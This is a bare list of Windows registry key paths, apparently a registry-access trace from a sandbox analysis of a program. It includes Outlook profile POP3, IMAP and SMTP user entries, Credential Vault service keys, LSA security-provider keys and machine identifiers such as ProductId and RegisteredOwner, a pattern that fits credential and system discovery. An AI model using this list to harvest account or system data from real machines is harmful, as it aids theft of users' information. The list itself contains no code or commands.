HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCountry
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sList
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sDecimal
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sThousand
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sGrouping
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNativeDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCurrency
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonDecimalSep
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonThousandSep
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonGrouping
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sPositiveSign
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNegativeSign
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sTimeFormat
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortTime
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s1159
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s2359
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortDate
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sYearMonth
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sLongDate
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCountry
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iMeasure
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iPaperSize
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iLZero
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegNumber
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\NumShape
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrency
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegCurr
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCalendarType
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Username
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Windows\CSDBuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastWatsonCabUploaded
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\44D72C57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
